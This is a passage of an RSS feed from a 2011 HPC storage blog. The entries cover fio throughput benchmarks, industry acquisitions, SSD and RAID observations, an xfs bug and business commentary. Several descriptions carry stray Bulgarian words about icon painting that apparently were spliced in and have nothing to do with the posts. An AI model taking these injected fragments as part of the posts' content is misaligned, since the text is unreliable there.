      <description>Readers of this blog will know I&amp;rsquo;ve been saying this publicly for a while (and no, I had no inside knowledge of this, no knowledge of it whatsoever, no one spoke to me, and I own no shares of any of these companies). Redhat acquiring Gluster is a good thing. While AB, Hitesh, and the team have done a bang up job getting the product out, and doing interesting things with it, they needed additional capital resources to take it to the next level.</description>
    </item>
    
    <item>
      <title>HPCWire readers choice awards:  feel free to write in awesome companies/products!</title>
      <link>https://blog.scalability.org/2011/09/hpcwire-readers-choice-awards-feel-free-to-write-in-awesome-companiesproducts/</link>
      <pubDate>Sat, 24 Sep 2011 17:20:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/09/hpcwire-readers-choice-awards-feel-free-to-write-in-awesome-companiesproducts/</guid>
      <description>See their link. They seem to have nicely allowed for write-ins, which makes voting better :) We don&amp;rsquo;t do much in manufacturing, so there&amp;rsquo;s little point to this for us. In HPC for life sciences, Scalable Informatics JackRabbit is in use at a number of sites as a very high performance storage unit. We don&amp;rsquo;t do much in automotive either. We do lots in financial services; with our Scalable Informatics JackRabbit being the best in breed performance for spinning rust systems, and from my understanding, causing some of our friends with pure PCIe Flash or SSD to say WTH!</description>
    </item>
    
    <item>
      <title>knobs that work</title>
      <link>https://blog.scalability.org/2011/09/knobs-that-work/</link>
      <pubDate>Fri, 23 Sep 2011 02:56:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/09/knobs-that-work/</guid>
      <description>As mentioned earlier, we&amp;rsquo;ve had a consistent problem with a few customers who wish to ignore their bills. They&amp;rsquo;d like to pretend we have no interest in getting paid, so they don&amp;rsquo;t pay. This is part of the reason why we&amp;rsquo;ve stopped acting like a bank. We aren&amp;rsquo;t very good at it, and its not our core competency. You want credit, go to a bank. You want the fastest (in terms of measured speed, not theoretical guesses) storage you can get, we can help.</description>
    </item>
    
    <item>
      <title>HP&#39;s board asks a deep fundamental question, possibly 10 months too late</title>
      <link>https://blog.scalability.org/2011/09/hps-board-asks-a-deep-fundamental-question-possibly-10-months-too-late/</link>
      <pubDate>Wed, 21 Sep 2011 21:39:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/09/hps-board-asks-a-deep-fundamental-question-possibly-10-months-too-late/</guid>
      <description>&amp;ldquo;Is this the right person for the job&amp;rdquo;? I pointed out that the direction itself was probably not that well thought out, and the concept &amp;hellip; dropping 1/3 of your revenue base, when you are atop the market in terms of installed base and run rate, probably wasn&amp;rsquo;t an idea that really should have been given serious credence. HP&amp;rsquo;s board is now, belatedly, asking &amp;hellip; do we have the right person for the job?</description>
    </item>
    
    <item>
      <title>On the test track with some new relampago device ...</title>
      <link>https://blog.scalability.org/2011/09/on-the-test-track-with-some-new-relampago-device/</link>
      <pubDate>Wed, 21 Sep 2011 20:17:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/09/on-the-test-track-with-some-new-relampago-device/</guid>
      <description>and we hit the throttle &amp;hellip; crack it open &amp;hellip; lets see what this baby can do Looking at a sustained &amp;hellip; well &amp;hellip; I dunno &amp;hellip; 1.2 million IOPs? Occasional bursts to 2.4M IOPs? At very nearly 10 GB/s? What does fio say?
 read : io=524416MB, bw=9339.6MB/s, iops=1195.5K, runt= 56150msec  and
Run status group 0 (all jobs): READ: io=524416MB, aggrb=9339.6MB/s, minb=9563.8MB/s, maxb=9563.8MB/s, mint=56150msec, maxt=56150msec  Nice! You may see something like this at SC11.</description>
    </item>
    
    <item>
      <title>Semi OT: Solar Ypsi</title>
      <link>https://blog.scalability.org/2011/09/semi-ot-solar-ypsi/</link>
      <pubDate>Wed, 21 Sep 2011 02:27:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/09/semi-ot-solar-ypsi/</guid>
      <description>Sometimes you know what your friends and acquaintances are up to &amp;hellip; and sometimes you see them in adverts for Google search &amp;hellip; Here&amp;rsquo;s the advert:
Its semi-OT as the person, Dave Strenski, is also an HPC hand of quite a stretch at Cray, and has been a colleague of mine during our SGI/Cray days. He was one of the reasons I thought Cray had some of simply the best technical people anywhere.</description>
    </item>
    
    <item>
      <title>Some boot options considered harmful to performance</title>
      <link>https://blog.scalability.org/2011/09/some-boot-options-considered-harmful-to-performance/</link>
      <pubDate>Fri, 16 Sep 2011 23:26:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/09/some-boot-options-considered-harmful-to-performance/</guid>
      <description>иконопис(BTW: still in London, then off to Stockholm, then home) A customer just saw this with RHEL 6. Windows performance was higher than Linux performance on the same machine. The customer didn&amp;rsquo;t understand it, we guessed at first about it, and in the end our initial guess was wrong. But we caught what was wrong, with a WAG, and it troubled me. So I wrote this. First clue as to the nature of the problem came from numastat.</description>
    </item>
    
    <item>
      <title>Coming soon to a JackRabbit and DeltaV near you ...</title>
      <link>https://blog.scalability.org/2011/09/coming-soon-to-a-jackrabbit-and-deltav-near-you/</link>
      <pubDate>Thu, 08 Sep 2011 20:27:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/09/coming-soon-to-a-jackrabbit-and-deltav-near-you/</guid>
      <description>&amp;hellip; 4TB drives. Imagine, a nice 192TB in a single unit, coupled to a 5GB/s data movement engine. Coming soon &amp;hellip; :)иконописikoni</description>
    </item>
    
    <item>
      <title>Hitachi Data Systems acquires Bluearc</title>
      <link>https://blog.scalability.org/2011/09/hitachi-data-systems-acquires-bluearc/</link>
      <pubDate>Thu, 08 Sep 2011 14:58:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/09/hitachi-data-systems-acquires-bluearc/</guid>
      <description>[disclosure note: this is our space, so we have definite opinions on this] This was liable to be the only possibly path for Bluearc to continue outside of an IPO. The latter would probably not have gone well. They raised their last round of capital a year ago. Reading what I wrote then, it was fairly prescient. Since that was written, EMC acquired Isilon, Netapp acquired LSI&amp;rsquo;s Enginio and other products, Dell grabbed Compellent (different market), HP grabbed 3Par.</description>
    </item>
    
    <item>
      <title>Seeing the light ... lots of app migration to accelerators (GPUs in particular)</title>
      <link>https://blog.scalability.org/2011/09/seeing-the-light-lots-of-app-migration-to-accelerators-gpus-in-particular/</link>
      <pubDate>Tue, 06 Sep 2011 18:59:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/09/seeing-the-light-lots-of-app-migration-to-accelerators-gpus-in-particular/</guid>
      <description>Last week, Gaussian Inc. started publicly talking about its GPU port of its Gaussian code. This is as conservative a development company as you will find. I know many other companies with ports (I won&amp;rsquo;t violate NDAs, which I&amp;rsquo;ve signed with a number of folks who post/comment here, and who read these &amp;hellip; feel free to post a note/link to your accelerated app). We&amp;rsquo;ve seen the early adopters come and stay.</description>
    </item>
    
    <item>
      <title>The business of business</title>
      <link>https://blog.scalability.org/2011/09/the-business-of-business/</link>
      <pubDate>Tue, 06 Sep 2011 16:13:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/09/the-business-of-business/</guid>
      <description>Just got an email from a vendor of workplace notices that reads
I won&amp;rsquo;t use the exact verbiage I think is appropriate for this.
So we&amp;rsquo;ve got an economy that&amp;rsquo;s struggling (well, we can euphemistically call it struggling), we have small businesses looking with great unease at future cost obligations due to new rules and regulations (one of which has been ruled unconstitutional, but the administration is pushing ahead on it anyway) &amp;hellip; and the current administration is seeking to make sure that my companies employees know that they can organize, that I have to tell them this, and that its unfair if I don&amp;rsquo;t.</description>
    </item>
    
    <item>
      <title>Science by ad hominem? The continuing saga of a debate that is not scientific, but personal</title>
      <link>https://blog.scalability.org/2011/09/science-by-ad-hominem-the-continuing-saga-of-a-debate-that-is-not-scientific-but-personal/</link>
      <pubDate>Tue, 06 Sep 2011 00:56:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/09/science-by-ad-hominem-the-continuing-saga-of-a-debate-that-is-not-scientific-but-personal/</guid>
      <description>This is sad. I am not sure precisely who is beclowning themselves, but we see something that amounts to an ad hominem attack on a pair of researchers, who had the temerity to publish something that disagreed with the orthodoxy. Along the way, they are described as &amp;ldquo;uncareful&amp;rdquo; and &amp;ldquo;serial error&amp;rdquo; creators. Their paper has been ripped to shreds in blogs, and by a particular aspect of the media, as well as by various members of the orthodoxy.</description>
    </item>
    
    <item>
      <title>badly underwhelmed by 120GB Intel 510 performance</title>
      <link>https://blog.scalability.org/2011/09/badly-underwhelmed-by-120gb-intel-510-performance/</link>
      <pubDate>Sun, 04 Sep 2011 15:30:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/09/badly-underwhelmed-by-120gb-intel-510-performance/</guid>
      <description>икониThe day job uses lots of SSDs as well as disks in various of our products. We rely upon internal testing and external benchmarks (which tend to be poor at best, but a very rough zeroth order test) to select them. We had a pair of Intel 510 SSD units in for a customer, and they performed &amp;hellip; just meh &amp;hellip; not all that exceptional. Better than our OS drives, but not as good as the higher end SSDs.</description>
    </item>
    
    <item>
      <title>Fixing pausing Nehalem/Westmere units</title>
      <link>https://blog.scalability.org/2011/09/fixing-pausing-nehalemwestmere-units/</link>
      <pubDate>Sun, 04 Sep 2011 06:01:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/09/fixing-pausing-nehalemwestmere-units/</guid>
      <description>иконографияSome Nehalem and Westmere units have &amp;hellip; er &amp;hellip; interesting unintended features &amp;hellip; yeah, thats the politically correct way to say it. We like Intel and their products (and we&amp;rsquo;ve liked AMD in the past and their products). But we gotta call this one. As you watch dstat output, you see these occasional &amp;hellip; hangs &amp;hellip; for a few seconds. As if someone is monkeying with the clock. And that is, to a degree what appears to be happening.</description>
    </item>
    
    <item>
      <title>Raw unapologetic firepower in a single machine ... a new record</title>
      <link>https://blog.scalability.org/2011/08/raw-unapologetic-firepower-in-a-single-machine-a-new-record/</link>
      <pubDate>Wed, 31 Aug 2011 02:45:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/raw-unapologetic-firepower-in-a-single-machine-a-new-record/</guid>
      <description>This is a 5U 108TB (0.1 PB) usable high performance tightly coupled storage unit we are shipping to a customer this week. This is a spinning rust machine. We&amp;rsquo;ve been busy little beavers. Tuning, tweaking. And tuning. And tweaking. Did I mention the tuning and tweaking?
Run status group 0 (all jobs): WRITE: io=196236MB, aggrb=4155.7MB/s, minb=4255.4MB/s, maxb=4255.4MB/s, mint=47222msec, maxt=47222msec  Oh. My. But &amp;hellip; it gets &amp;hellip; better.
Run status group 0 (all jobs): READ: io=196236MB, aggrb=5128.</description>
    </item>
    
    <item>
      <title>knobs</title>
      <link>https://blog.scalability.org/2011/08/knobs/</link>
      <pubDate>Tue, 30 Aug 2011 13:04:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/knobs/</guid>
      <description>A knob is something you can turn, in theory, to effect a change in output condition. In my business, I have a few knobs I can turn for customers to help them. We can be quite creative in this. We are often asked to help in cases where other companies would just start blinking rapidly. I like doing this. I really do enjoy working with customers and helping them solve their hard problems.</description>
    </item>
    
    <item>
      <title>Day job will have a booth at SC11 ... Woot!</title>
      <link>https://blog.scalability.org/2011/08/day-job-will-have-a-booth-at-sc11-woot/</link>
      <pubDate>Fri, 26 Aug 2011 04:21:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/day-job-will-have-a-booth-at-sc11-woot/</guid>
      <description>икони на светциWhats different about this one? Its ours, not space in someone else&amp;rsquo;s. Gives us more freedom, but also greater responsibility. One of the harder things to do is to figure out what to bring and show, and what to leave in the lab. Shipping stuff to the floor is expensive, time consuming, and a royal pain in the rear. Leaving it in the lab, and leveraging the network (not the wireless &amp;hellip; oh god that was horrible last year) is probably a better option.</description>
    </item>
    
    <item>
      <title>Day job adds a director of sales</title>
      <link>https://blog.scalability.org/2011/08/day-job-adds-a-director-of-sales/</link>
      <pubDate>Fri, 26 Aug 2011 04:13:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/day-job-adds-a-director-of-sales/</guid>
      <description>Took us long enough, but fundamentally, you have to work on getting the right team together. Someone I&amp;rsquo;ve known and respected for quite some time became available. I&amp;rsquo;ve been saying for a while we need someone just like him. So I didn&amp;rsquo;t miss the opportunity. Looking forward to reaching more customers and partners with him on board. More later &amp;hellip;</description>
    </item>
    
    <item>
      <title>Another day job milestone: afterburners kicking in on the company!</title>
      <link>https://blog.scalability.org/2011/08/another-day-job-milestone/</link>
      <pubDate>Tue, 23 Aug 2011 18:57:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/another-day-job-milestone/</guid>
      <description>As of today, we have achieved our highest revenue ever in a year as a company. And the year is only 3/4 over. We&amp;rsquo;re not done. Not by a long shot. If we shut the doors, and went on a nice 3+ month long vacation until the end of the year &amp;hellip; we&amp;rsquo;d have a 20% growth rate over last year for revenue. As it is, the 4th quarter is usually our busiest time.</description>
    </item>
    
    <item>
      <title>Is this really a good idea?</title>
      <link>https://blog.scalability.org/2011/08/is-this-really-a-good-idea/</link>
      <pubDate>Mon, 22 Aug 2011 05:39:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/is-this-really-a-good-idea/</guid>
      <description>ikoniLooks like HP is looking at ditching its PCs. First off, they are definitely killing off WebOS and the whole Palm business. Ok &amp;hellip; WebOS looked interesting. Now having an Android, and an iPhone (about to be retired, which the Android is replacing), I find it hard to put down the iPhone and get excited about Android. I have a sense of &amp;hellip; a less polished integration. Some things don&amp;rsquo;t work very well in Android.</description>
    </item>
    
    <item>
      <title>&#39;Amusing&#39; benchmarketing ... without ever having run a benchmark!</title>
      <link>https://blog.scalability.org/2011/08/amusing-benchmarketing-without-ever-having-run-a-benchmark/</link>
      <pubDate>Fri, 19 Aug 2011 18:05:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/amusing-benchmarketing-without-ever-having-run-a-benchmark/</guid>
      <description>Imagine you have a product, and you really haven&amp;rsquo;t measured its performance, but you want to make performance claims. So you take an &amp;ldquo;easy&amp;rdquo; way around this. You simply add up all your bandwidth or IOP data. Yeah, thats it, you add it up. No, I&amp;rsquo;m not kidding. You do this. Is this meaningful in the HPC world? Hell no. Do people do this? Hell yes. Is it wrong? Extremely. Should you call vendors out who do this?</description>
    </item>
    
    <item>
      <title>A &#39;cool&#39; xfs bug</title>
      <link>https://blog.scalability.org/2011/08/a-cool-xfs-bug/</link>
      <pubDate>Fri, 19 Aug 2011 14:27:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/a-cool-xfs-bug/</guid>
      <description>No, really, bugs can be cool &amp;hellip; Customer has a user with a proclivity towards writing large files. Sparse large files. Say a couple Petabytes or so. Single file. I kid you not. (filenames and paths changed)
[root@jr4-2 ~]# ls -alF /data/brick-sdd2/dht/scratch/xyzpdq total 4652823496 d--------- 2 1232 1000 86 Jun 27 20:31 ./ drwx------ 104 1232 1000 65536 Aug 17 23:53 ../ -rw------- 1 1232 1000 21 Jun 27 09:57 Default.</description>
    </item>
    
    <item>
      <title>... and Ubuntu 11.04 has an every so slightly broken root on iSCSI ...</title>
      <link>https://blog.scalability.org/2011/08/and-ubuntu-11-04-has-an-every-so-slightly-broken-root-on-iscsi/</link>
      <pubDate>Mon, 15 Aug 2011 20:08:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/and-ubuntu-11-04-has-an-every-so-slightly-broken-root-on-iscsi/</guid>
      <description>Православни икониUgh. See here. Got bit by this. BTW: The new internals of Tiburon are getting even more wild. This thing is turning into a very powerful system for booting large numbers of machines with (nearly) identical configs, very quickly (hmmm &amp;hellip; can you say &amp;hellip; cluster? Cloud? VMs? &amp;hellip;. mwhahahaha!). Will be re-adapting our menu system for this, but the Web GUI portion for configuring this is definitely in the near future.</description>
    </item>
    
    <item>
      <title>Been working on a GUI ... starting to hook the bits together ...</title>
      <link>https://blog.scalability.org/2011/08/been-working-on-a-gui-starting-to-hook-the-bits-together/</link>
      <pubDate>Sun, 14 Aug 2011 21:41:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/been-working-on-a-gui-starting-to-hook-the-bits-together/</guid>
      <description>The day job is asked for monitoring and admin GUIs for our products. I&amp;rsquo;ll be the first to admit I am a CLI person these days (having started out a CLI person, then becoming a GUI person, now back to a CLI person). I understand the desire for this, and some of the rationale behind it. So we&amp;rsquo;ve been thinking how to provide this as simply and unobtrusively as possible. And leverage/use/reuse our CLI goodness.</description>
    </item>
    
    <item>
      <title>An interesting perspective on running and maintaining a business in California</title>
      <link>https://blog.scalability.org/2011/08/an-interesting-perspective-on-running-and-maintaining-a-business-in-california/</link>
      <pubDate>Sun, 14 Aug 2011 01:57:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/an-interesting-perspective-on-running-and-maintaining-a-business-in-california/</guid>
      <description>[update: reorganized to have link up top, and commentary below this] Have a read of this blog entry. Very interesting. As a small business person, I am acutely aware of all the myriad ways that rules, regulations, taxes and fees can rise unexpectedly upon you. When taxes aren&amp;rsquo;t sane or predictable, you can suddenly get a bill for a substantial fraction of a well paid employees monthly or yearly salary. We had that experience last year with Michigan&amp;rsquo;s MBT which replaced the SBT.</description>
    </item>
    
    <item>
      <title>Interesting comment from an SSD vendor support person</title>
      <link>https://blog.scalability.org/2011/08/interesting-comment-from-an-ssd-vendor-support-person/</link>
      <pubDate>Fri, 12 Aug 2011 19:30:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/interesting-comment-from-an-ssd-vendor-support-person/</guid>
      <description>Color me unimpressed. You have a &amp;ldquo;disk&amp;rdquo; drive, you expect all the trappings of that &amp;ldquo;disk&amp;rdquo; drive to work. Like activity lights. So you plug this device into a backplane that lights its activity lights from the disk. And it doesn&amp;rsquo;t work. Speaking with the backplane folks, they get their signals from the disk. Speaking with the disk folks &amp;hellip; Me: The activity light appears to be solid on all the time.</description>
    </item>
    
    <item>
      <title>Very cool science: broad spectrum anti-viral</title>
      <link>https://blog.scalability.org/2011/08/very-cool-science-broad-spectrum-anti-viral/</link>
      <pubDate>Wed, 10 Aug 2011 23:08:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/very-cool-science-broad-spectrum-anti-viral/</guid>
      <description>I saw this initially on /., and it linked to PLoS. PLoS is a great system BTW, and I&amp;rsquo;d love to see Physics, Engineering, CS, and other things join in. arxiv.org serves a similar function (rapid publication) though it isn&amp;rsquo;t peer reviewed prior to publication, while PLoS is. Basically, this anti-viral appears to show excellent efficacy across multiple virus infections &amp;hellip; everything from Dengue Fever to Rhinovirus (common cold). It would be wonderful if this technique would be active against retroviruses (HIV, etc.</description>
    </item>
    
    <item>
      <title>then afterburners kicked in ...</title>
      <link>https://blog.scalability.org/2011/08/then-afterburners-kicked-in/</link>
      <pubDate>Wed, 10 Aug 2011 21:19:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/then-afterburners-kicked-in/</guid>
      <description>&amp;hellip; sumthin fierce &amp;hellip; This could be (the) fastest 4U box on the market for streaming, which doesn&amp;rsquo;t use RAM for storage.
Run status group 0 (all jobs): READ: io=761904MB, aggrb=7455.4MB/s, minb=7634.3MB/s, maxb=7634.3MB/s, mint=102196msec, maxt=102196msec  That streaming is more than 8x RAM size. No PCIe flash cards in the unit. None. Zero. Zilch. yeah BABY!!! Right now, running a random read of that data set. 8k random reads across the entire 700+ GB data.</description>
    </item>
    
    <item>
      <title>Setting expectations for SSDs versus Flash</title>
      <link>https://blog.scalability.org/2011/08/setting-expectations-for-ssds-versus-flash/</link>
      <pubDate>Wed, 10 Aug 2011 20:52:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/setting-expectations-for-ssds-versus-flash/</guid>
      <description>Nomenclature: SSD is a physical device that plugs into an electrical disk slot. Flash is a PCIe card. Both use the same underlying back end storage technology (flash chips of SLC, MLC, and related). I&amp;rsquo;ve had a while to do some testing with a large number of SSD units in a single device. I can give you a definite sense of what I&amp;rsquo;ve been observing. First: SSDs are, of course, fast for certain operations.</description>
    </item>
    
    <item>
      <title>&#34;Evolution&#34; for Microsoft HPC</title>
      <link>https://blog.scalability.org/2011/08/evolution-for-microsoft-hpc/</link>
      <pubDate>Wed, 10 Aug 2011 06:08:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/evolution-for-microsoft-hpc/</guid>
      <description>This is old news at this time, but Microsoft has moved its HPC group into their Cloud groups. I&amp;rsquo;ve talked in the past about critical business decisions that need to be addressed over time, as a business matures, and a product line is given time to sink or swim. At the end of the day, a business has to make hard decisions about what products to introduce, which to end-of-life, which to grow independently, which to fold into other initiatives.</description>
    </item>
    
    <item>
      <title>heh ... good one !</title>
      <link>https://blog.scalability.org/2011/08/heh-good-one/</link>
      <pubDate>Tue, 09 Aug 2011 03:32:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/heh-good-one/</guid>
      <description>&amp;ldquo;Scientists Trace Heat Wave To Massive Star At Center Of Solar System&amp;rdquo; See here</description>
    </item>
    
    <item>
      <title>Not surprised ...  IBM pulls plug on Blue Waters</title>
      <link>https://blog.scalability.org/2011/08/not-surprised-ibm-pulls-plug-on-blue-waters/</link>
      <pubDate>Tue, 09 Aug 2011 02:33:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/not-surprised-ibm-pulls-plug-on-blue-waters/</guid>
      <description>I say I am not surprised for their reasoning &amp;hellip; not that I had an inkling that they would do this before hand. Basically they pulled the plug because the costs were growing far faster than they planned, and they couldn&amp;rsquo;t afford to deliver the machine at the requested price. Which makes perfect sense to a business that has to consider profit and loss, but maybe not so much sense to research groups that want things.</description>
    </item>
    
    <item>
      <title>Ever have one of them moments ...</title>
      <link>https://blog.scalability.org/2011/08/ever-have-one-of-them-moments/</link>
      <pubDate>Mon, 08 Aug 2011 04:43:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/ever-have-one-of-them-moments/</guid>
      <description>&amp;hellip; where you look at a technology and think to yourself &amp;hellip; I need this. Just had that looking over MongoDB. I&amp;rsquo;ve spent the better part of a couple of weeks working on implementing a very poor mans version of this atop SQLite for one of our tools. And along comes MongoDB, and they solve the exact problem I am looking for. So, we are going to start implementing it on our units.</description>
    </item>
    
    <item>
      <title>Rethinking RAID for SSDs</title>
      <link>https://blog.scalability.org/2011/08/rethinking-raid-for-ssds/</link>
      <pubDate>Mon, 08 Aug 2011 04:15:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/rethinking-raid-for-ssds/</guid>
      <description>SSD units are fast, well, depending upon design, controller and other things. Sandforce units use a compression and overprovision technology to reduce write amplification. SSD units do writes, optimally, in erase block sizes. This suggests that your RAID chunk size should be a multiple of the erase block size. This is a good thing. The issue is that if you have a hardware RAID controller, you might think that the optimal way to handle this is to build a RAID5 or RAID6 atop this SSD pool.</description>
    </item>
    
    <item>
      <title>OT: and on a happy personal note ...</title>
      <link>https://blog.scalability.org/2011/08/ot-and-on-a-happy-personal-note/</link>
      <pubDate>Mon, 08 Aug 2011 03:42:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/ot-and-on-a-happy-personal-note/</guid>
      <description>&amp;hellip; both my daughter and I were promoted to yon-kyu (green belt) in Isshinryu. Took me longer than I liked, but the specific kata we were learning was complex. Ok, it looks simple, but &amp;hellip; it really &amp;hellip; really &amp;hellip; isn&amp;rsquo;t. There is great subtlety in it. Mastering this takes a while. The moves took me about a month. The rest took me much longer. Here is one of the style&amp;rsquo;s leadership (10th Dan) showing how to do this</description>
    </item>
    
    <item>
      <title>PCIe Flash:  Yeah, I think its here to stay</title>
      <link>https://blog.scalability.org/2011/08/pcie-flash-yeah-i-think-its-here-to-stay/</link>
      <pubDate>Mon, 08 Aug 2011 02:43:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/pcie-flash-yeah-i-think-its-here-to-stay/</guid>
      <description>I&amp;rsquo;ve had some concerns over the business model for this. The price per GB is way &amp;hellip; way out there for SLC. The use case for SLC vs MLC (especially with eMLC coming on line) is very similar. The cost of MLC is making these units affordable, and even considerable for people. There seem to be a consumer/hobbyist version and a professional class. The former has a bad performance rap from the first set of products.</description>
    </item>
    
    <item>
      <title>Many happenings in HPC ...</title>
      <link>https://blog.scalability.org/2011/08/many-happenings-in-hpc/</link>
      <pubDate>Mon, 08 Aug 2011 02:20:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/many-happenings-in-hpc/</guid>
      <description>I&amp;rsquo;ve been mostly heads down for the last month, very little time to work on posts. This is a good thing, as this has been mostly (new) business bits. We&amp;rsquo;ve got a range of new products we&amp;rsquo;ve been working on to address specific market segments, and have a number of nice new wins in a market segment we&amp;rsquo;ve been working on for a while. Working on more of course, and our core markets.</description>
    </item>
    
    <item>
      <title>OT:  This juxtaposition on Drudge ... I&#39;m sure it was an accident ...</title>
      <link>https://blog.scalability.org/2011/08/ot-this-juxtaposition-on-drudge-im-sure-it-was-an-accident/</link>
      <pubDate>Fri, 05 Aug 2011 21:35:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/ot-this-juxtaposition-on-drudge-im-sure-it-was-an-accident/</guid>
      <description>Its a Friday, I&amp;rsquo;ve had a tough week (caught pneumonia on the way home from NY, been recovering all this time). Hopefully this isn&amp;rsquo;t the meds talking below &amp;hellip; Every now and then, there is inadvertent and unintentional humor in news. Well, the juxtapositions are humorous, even if the events are terrible. Think &amp;hellip;. causality &amp;hellip; below &amp;hellip;
Obviously, violence isn&amp;rsquo;t a laughing matter. But that juxtaposition &amp;hellip; with Jersey Shore immediately above it &amp;hellip; doesn&amp;rsquo;t quite suggest it was &amp;hellip; or wasn&amp;rsquo;t!</description>
    </item>
    
    <item>
      <title>... and the day job turned 9 ...</title>
      <link>https://blog.scalability.org/2011/08/and-the-day-job-turned-9/</link>
      <pubDate>Wed, 03 Aug 2011 03:13:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/and-the-day-job-turned-9/</guid>
      <description>&amp;hellip; on Monday &amp;hellip; Woo Hoo!!! What hasn&amp;rsquo;t killed us, has made us stronger &amp;hellip; Or something like that. More correctly, the company was born 1-August-2002. Growing since inception. About to grow some more. No venture backing. During this time, we&amp;rsquo;ve worked on trying to convince people that accelerators would be important to HPC, back in 2004 time frame or so. Tried to raise capital, built business plans, got most of the details right.</description>
    </item>
    
    <item>
      <title>Benchies: figuring out how to tune this thing ...</title>
      <link>https://blog.scalability.org/2011/08/benchies-figuring-out-how-to-tune-this-thing/</link>
      <pubDate>Tue, 02 Aug 2011 02:47:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/08/benchies-figuring-out-how-to-tune-this-thing/</guid>
      <description>Design is good, but it looks like we are rate limited on the PCIe gen 2. 128GB read from a single name space. 8 simultaneous threads.
Run status group 0 (all jobs): READ: io=126984MB, aggrb=5285.8MB/s, minb=5412.6MB/s, maxb=5412.6MB/s, mint=24024msec, maxt=24024msec  Yes, that is 5.3 GB/s. Still far south of what we can be doing, but I&amp;rsquo;ve verified that we are rate limited to ~2GB/s per RAID with other tests. This looks like a card issue.</description>
    </item>
    
    <item>
      <title>Giddy ...</title>
      <link>https://blog.scalability.org/2011/07/giddy/</link>
      <pubDate>Tue, 26 Jul 2011 23:11:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/07/giddy/</guid>
      <description>икониBenchies soon. Real soon. Should be a screamer &amp;hellip; if we designed/built it right.</description>
    </item>
    
    <item>
      <title>HPC in the cloud and cluster distributions</title>
      <link>https://blog.scalability.org/2011/07/hpc-in-the-cloud-and-cluster-distributions/</link>
      <pubDate>Tue, 26 Jul 2011 05:15:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/07/hpc-in-the-cloud-and-cluster-distributions/</guid>
      <description>Many things are moving to cloud hosting &amp;hellip; I won&amp;rsquo;t comment on being right or wrong about their moving &amp;hellip; and HPC is one of them. This means that cluster distributions are going to follow &amp;hellip; or could follow to some degree. Some cluster distributions focus upon packaging, some focus upon flexibility, some focus upon GUIs. All try to integrate some subset of needed tools. But all were effectively designed for a cluster computing model where some of the key/critical assumptions at the base of the distribution are simply not the case in the cloud, and due to the way they work, can&amp;rsquo;t easily be worked around.</description>
    </item>
    
    <item>
      <title>Many reasons for not posting in the last two weeks</title>
      <link>https://blog.scalability.org/2011/07/many-reasons-for-not-posting-in-the-last-two-weeks/</link>
      <pubDate>Mon, 25 Jul 2011 20:50:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/07/many-reasons-for-not-posting-in-the-last-two-weeks/</guid>
      <description>None of them bad. Too much work to get through (yes, that does mean new/existing orders). A vacation (long overdue, and yes, I was working though it as well). Back now &amp;hellip; will be catching up soon with a set of posts in the next few days.</description>
    </item>
    
    <item>
      <title>Color me amused ...</title>
      <link>https://blog.scalability.org/2011/07/color-me-amused/</link>
      <pubDate>Wed, 13 Jul 2011 21:00:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/07/color-me-amused/</guid>
      <description>Every now and then recruiters call me. Want to see if I want the glamour of some new position somewhere. I run a very nice little, and growing company. I own a substantial fraction of this company. Our revenues are far more than the recruiter&amp;rsquo;s company is likely willing to pay. There are too many digits in our revenues, before the decimal point, relative to any likely salary. I am working extremely hard at increasing the number of digits.</description>
    </item>
    
    <item>
      <title>Storm knocked out power for a while ...</title>
      <link>https://blog.scalability.org/2011/07/storm-knocked-out-power-for-a-while/</link>
      <pubDate>Tue, 12 Jul 2011 23:09:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/07/storm-knocked-out-power-for-a-while/</guid>
